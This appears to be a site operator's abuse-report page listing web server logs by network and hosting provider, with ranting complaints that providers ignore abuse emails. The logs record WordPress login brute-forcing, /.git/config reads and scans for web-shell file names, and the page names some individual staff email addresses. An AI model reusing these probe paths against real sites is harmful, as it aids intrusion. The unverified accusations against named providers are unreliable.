abuse@masterhost.ru – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
90.156.142.52 www.website*x.com – – [31/Aug/2025:10:39:15 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“
90.156.142.52 www.website*x.com – – [31/Aug/2025:10:39:15 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“
90.156.142.71 www.website*x.com – – [31/Aug/2025:11:12:17 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15“
90.156.142.71 www.website*x.com – – [31/Aug/2025:11:12:17 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“
90.156.142.59 www.website*x.com – – [31/Aug/2025:11:17:11 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5“
90.156.142.59 www.website*x.com – – [31/Aug/2025:11:17:11 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
AS214940 – KPROHOST LLC – AGAIN AND AGAIN! – VERY UNSECURE PROVIDER! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@virtualine.org – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
198.55.98.93 website*x.com – – [31/Aug/2025:10:45:54 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „BlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103“
198.55.98.93 website*x.com – – [31/Aug/2025:10:46:08 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „W3C_Validator/1.305.2.12 libwww-perl/5.64“
AS21499 – Host Europe GmbH – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hosteurope.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
92.205.167.152 www.website*x.com – – [31/Aug/2025:10:48:39 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“
92.205.167.152 www.website*x.com – – [31/Aug/2025:10:48:39 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“
AS51559 – Netinternet Bilisim Teknolojileri AS – IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ni.net.tr – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
159.253.39.62 www.website*x.com – – [31/Aug/2025:10:53:14 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0“

MAIL NR. 25 TODAY!
abuse@spectraip.nl,IARPOC@Newfold.com,legal@bluehost.com,eig-noc@endurance.com,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de
AS62068 – SpectraIP B.V. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@spectraip.nl – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
5.182.209.204 www.website*x.com – – [31/Aug/2025:10:57:53 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
5.182.209.204 www.website*x.com – – [31/Aug/2025:10:57:53 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0“
AS19871 – Network Solutions, LLC – HERE WITH 2 IP´S! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
IARPOC@Newfold.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
50.6.138.156 www.website*x.com – – [31/Aug/2025:11:02:38 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“
50.6.138.156 www.website*x.com – – [31/Aug/2025:11:02:40 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0“
+
192.185.81.116 www.website*x.com – – [31/Aug/2025:11:07:32 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
192.185.81.116 www.website*x.com – – [31/Aug/2025:11:07:32 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
AS40021 – Contabo Inc. – HERE WITH 3 IP´! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
157.173.200.105 www.website*x.com – – [31/Aug/2025:11:22:09 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0“
157.173.200.105 www.website*x.com – – [31/Aug/2025:11:22:10 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203“
+
161.97.81.10 www.website*x.com – – [31/Aug/2025:12:34:51 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0“
161.97.81.10 www.website*x.com – – [31/Aug/2025:12:34:52 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15“
+
144.91.88.83 www.website*x.com – – [31/Aug/2025:13:12:00 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0“
144.91.88.83 www.website*x.com – – [31/Aug/2025:13:12:00 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14“

MAIL NR. 26 TODAY!
abuse@anexia.at,abuse@webdc.ru,soporte@parallelchile.cl,abuse@hostingdunyam.com.tr
AT-ANXHOLDING2-20210908 – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@anexia.at
152.53.103.246 www.website*x.com – – [31/Aug/2025:11:37:02 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15“
152.53.103.246 www.website*x.com – – [31/Aug/2025:11:37:02 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67“
AS29182 – JSC IOT – RUSSIA IS VERY UNWANTED!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@webdc.ru – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
80.87.199.123 www.website*x.com – – [31/Aug/2025:11:46:49 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67“
80.87.199.123 www.website*x.com – – [31/Aug/2025:11:46:50 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“
AS269993 – COMPAÑÍA CHILENA DE COMUNICACIONES PARALLEL S.A. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
soporte@parallelchile.cl
181.177.223.27 www.website*x.com – – [31/Aug/2025:11:51:40 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0“
181.177.223.27 www.website*x.com – – [31/Aug/2025:11:51:40 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5“
AS212219 – HOSTING DUNYAM – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hostingdunyam.com.tr – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
91.151.95.70 www.website*x.com – – [31/Aug/2025:11:56:19 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“
91.151.95.70 www.website*x.com – – [31/Aug/2025:11:56:20 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0“

MAIL NR. 27 TODAY!
abuse@airnet.uz,ripe@bkm.uz,abuse@reliablesite.net,google-cloud-compliance@google.com, network-abuse@google.com
AS212860 – AIRNET llc – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@airnet.uz – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
95.182.118.170 www.website*x.com – – [31/Aug/2025:12:05:41 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0“
95.182.118.170 www.website*x.com – – [31/Aug/2025:12:05:41 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“
AS8193 – „Uzbektelekom“ Joint Stock Company – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ripe@bkm.uz – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
213.230.65.2 www.website*x.com – – [31/Aug/2025:12:10:26 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15“
213.230.65.2 www.website*x.com – – [31/Aug/2025:12:10:26 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
AS23470 – ReliableSite.Net LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@reliablesite.net – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
172.96.141.80 www.website*x.com – – [31/Aug/2025:12:25:06 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14“
172.96.141.80 www.website*x.com – – [31/Aug/2025:12:25:06 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“
AS396982 – Google LLC – AGAIN AND AGAIN EVERY DAY! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
google-cloud-compliance@google.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
35.200.202.200 www.website*x.com – – [31/Aug/2025:12:29:54 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
35.200.202.200 www.website*x.com – – [31/Aug/2025:12:29:54 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“

MAIL NR. 28 TODAY!
IARPOC@Newfold.com,legal@bluehost.com,eig-net-team@endurance.com,eig-noc@endurance.com,abuse@hudsonvalleyhost.com
AS19871 – Network Solutions, LLC – HERE WITH 2 IP´S – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
IARPOC@Newfold.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
162.241.63.58 www.website*x.com – – [31/Aug/2025:12:49:11 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0“
162.241.63.58 www.website*x.com – – [31/Aug/2025:12:49:12 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“
+
162.241.2.250 www.website*x.com – – [31/Aug/2025:13:07:26 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“
162.241.2.250 www.website*x.com – – [31/Aug/2025:13:07:26 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“
AS46606 – Unified Layer – HERE WITH 2 IP´S!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
IARPOC@Newfold.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
162.241.218.37 www.website*x.com – – [31/Aug/2025:12:53:44 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203“
162.241.218.37 www.website*x.com – – [31/Aug/2025:12:53:44 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
+
162.241.218.61 www.website*x.com – – [31/Aug/2025:12:58:21 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50“
162.241.218.61 www.website*x.com – – [31/Aug/2025:12:58:22 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15“
Hudson Valley Host – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hudsonvalleyhost.com
107.172.243.11 www.website*x.com – – [31/Aug/2025:13:02:46 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
107.172.243.11 www.website*x.com – – [31/Aug/2025:13:02:46 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“

MAIL NR. 29 TODAY!
domain-abuse@dreamhost.com,nancy.cordova@telefonica.com
AS26347 – New Dream Network, LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
domain-abuse@dreamhost.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
64.90.38.74 www.website*x.com – – [31/Aug/2025:13:26:00 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
64.90.38.74 www.website*x.com – – [31/Aug/2025:13:26:01 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15“
AS6147 – Telefonica del Peru S.A.A. – NETWORK 2001:1388::/31 IS NOW COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
nancy.cordova@telefonica.com
2001:1388:13a6:dc8d:d86f:616e:4ca7:ce98 website*x.com – – [31/Aug/2025:13:35:33 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Linux; Android 10; x86) AppleWebKit/537.36 (KHTML, like Gecko) Opera/76.0.0.0 Safari/537.36“

MAIL NR. 30 TODAY!
abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com
AS8075 – Microsoft Corporation – HERE WITH 3 IP´S! – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:36 +0200] „GET /wp.php HTTP/1.0“ 302 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:37 +0200] „GET /file.php HTTP/1.0“ 302 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:37 +0200] „GET /file2.php HTTP/1.0“ 302 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:37 +0200] „GET /asasx.php HTTP/1.0“ 302 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:38 +0200] „GET /flower.php HTTP/1.0“ 302 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:38 +0200] „GET /dropdown.php HTTP/1.0“ 302 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:38 +0200] „GET /about.php HTTP/1.0“ 302 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:38 +0200] „GET /akc.php HTTP/1.0“ 302 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:39 +0200] „GET /alfa.php HTTP/1.0“ 302 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:39 +0200] „GET /as.php HTTP/1.0“ 302 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:39 +0200] „GET /atomlib.php HTTP/1.0“ 302 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:39 +0200] „GET /b.php HTTP/1.0“ 302 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:40 +0200] „GET /blog/fw.php HTTP/1.0“ 403 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:40 +0200] „GET /bugz.php HTTP/1.0“ 302 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:40 +0200] „GET /byp.php HTTP/1.0“ 302 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:40 +0200] „GET /cc.php HTTP/1.0“ 302 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:41 +0200] „GET /class.php HTTP/1.0“ 403 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:41 +0200] „GET /classwithtostring.php HTTP/1.0“ 302 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:41 +0200] „GET /composer.php HTTP/1.0“ 302 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:41 +0200] „GET /css.php HTTP/1.0“ 403 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:41 +0200] „GET /edit.php HTTP/1.0“ 302 – „-“ „-“
4.225.217.97 website*x.com – – [31/Aug/2025:17:01:42 +0200] „GET /f35.php HTTP/1.0“ 302 – „-“ „-“
… and so on… and so on!!!
+
52.178.144.89 website*x.com – – [31/Aug/2025:23:20:59 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
52.178.144.89 website*x.com – – [31/Aug/2025:23:20:59 +0200] „GET /xex.php HTTP/1.0“ 302 – „-“ „-“
52.178.144.89 website*x.com – – [31/Aug/2025:23:21:10 +0200] „GET /winkel.php HTTP/1.0“ 302 – „-“ „-“
52.178.144.89 website*x.com – – [31/Aug/2025:23:21:25 +0200] „GET /golden.php HTTP/1.0“ 302 – „-“ „-“
52.178.144.89 website*x.com – – [31/Aug/2025:23:21:40 +0200] „GET /btufulhs.php HTTP/1.0“ 302 – „-“ „-“
52.178.144.89 website*x.com – – [31/Aug/2025:23:21:55 +0200] „GET /file2 HTTP/1.0“ 403 – „-“ „-“
52.178.144.89 website*x.com – – [31/Aug/2025:23:21:55 +0200] „GET /lc.php HTTP/1.0“ 302 – „-“ „-“
52.178.144.89 website*x.com – – [31/Aug/2025:23:22:10 +0200] „GET /great.php HTTP/1.0“ 302 – „-“ „-“
52.178.144.89 website*x.com – – [31/Aug/2025:23:22:25 +0200] „GET /past.php HTTP/1.0“ 302 – „-“ „-“
52.178.144.89 website*x.com – – [31/Aug/2025:23:22:40 +0200] „GET /rtheq.php HTTP/1.0“ 302 – „-“ „-“
52.178.144.89 website*x.com – – [31/Aug/2025:23:22:55 +0200] „GET /gloomed.php HTTP/1.0“ 302 – „-“ „-“
52.178.144.89 website*x.com – – [31/Aug/2025:23:23:10 +0200] „GET /x35.php HTTP/1.0“ 302 – „-“ „-“
52.178.144.89 website*x.com – – [31/Aug/2025:23:23:25 +0200] „GET /e.php HTTP/1.0“ 302 – „-“ „-“
52.178.144.89 website*x.com – – [31/Aug/2025:23:23:40 +0200] „GET /lv.php HTTP/1.0“ 302 – „-“ „-“
52.178.144.89 website*x.com – – [31/Aug/2025:23:23:55 +0200] „GET /dedi1.php HTTP/1.0“ 302 – „-“ „-“
52.178.144.89 website*x.com – – [31/Aug/2025:23:24:10 +0200] „GET /zc-639.php HTTP/1.0“ 302 – „-“ „-“
52.178.144.89 website*x.com – – [31/Aug/2025:23:24:25 +0200] „GET /wp-mn.php HTTP/1.0“ 302 – „-“ „-“
+
13.76.244.185 website*x.com – – [01/Sep/2025:02:10:25 +0200] „GET /re.php HTTP/1.0“ 302 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:10:40 +0200] „GET /images/Marvins.php HTTP/1.0“ 403 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:10:40 +0200] „GET /ahax.php HTTP/1.0“ 302 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:10:55 +0200] „GET /login.php HTTP/1.0“ 302 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:11:10 +0200] „GET /new4.php HTTP/1.0“ 302 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:11:25 +0200] „GET /wp-content/plugins/wp-conflg.php HTTP/1.0“ 403 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:11:25 +0200] „GET /sty.php HTTP/1.0“ 302 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:11:40 +0200] „GET /post.php HTTP/1.0“ 302 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:11:55 +0200] „GET /wp/sih.php HTTP/1.0“ 403 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:11:56 +0200] „GET /wp-xml.php HTTP/1.0“ 302 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:12:11 +0200] „GET /pn.php HTTP/1.0“ 302 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:12:26 +0200] „GET /wp-includes/Text/Diff/Engine/about.php HTTP/1.0“ 403 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:12:26 +0200] „GET /wp-content/themes/twentytwentytwo/index.php HTTP/1.0“ 403 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:12:26 +0200] „GET /wp-admin/doc.php HTTP/1.0“ 302 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:12:41 +0200] „GET /dox.php HTTP/1.0“ 302 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:12:56 +0200] „GET /wp-includes/blocks/chosen.php HTTP/1.0“ 403 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:12:56 +0200] „GET /new.php HTTP/1.0“ 302 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:13:11 +0200] „GET /wp-content/themes/twentytwentytwo/alfa-rex.php HTTP/1.0“ 403 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:13:12 +0200] „GET /log.php HTTP/1.0“ 302 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:13:27 +0200] „GET /JPG.php HTTP/1.0“ 302 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:13:42 +0200] „GET /num.php HTTP/1.0“ 302 – „-“ „-“
13.76.244.185 website*x.com – – [01/Sep/2025:02:13:57 +0200] „GET /wp-admin/includes/xmrlpc.php HTTP/1.0“ 302 – „-“ „-“

DONNERSTAG Morgens, 28.08.25:

MAIL NR. 1 TODAY!

AS26347 – New Dream Network, LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
domain-abuse@dreamhost.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
